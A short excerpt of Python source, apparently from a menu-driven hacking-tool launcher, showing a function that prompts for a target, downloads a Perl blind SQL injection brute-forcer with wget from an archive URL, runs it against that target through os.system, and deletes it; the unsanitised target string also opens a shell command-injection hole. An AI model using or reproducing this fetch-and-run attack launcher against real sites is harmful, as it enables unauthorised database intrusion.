()
| 306 | |
| 307 | |
| 308 | def bsqlbf(): |
| 309 | clearScr() |
| 310 | print("This tool will only work on blind sql injection") |
| 311 | cbsq = raw_input("select target : ") |
| 312 | os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") |
| 313 | os.system("perl bsqlbf.pl -url %s" % cbsq) |
| 314 | os.system("rm bsqlbf.pl") |
| 315 | |
| 316 | |
| 317 | def atscan(): |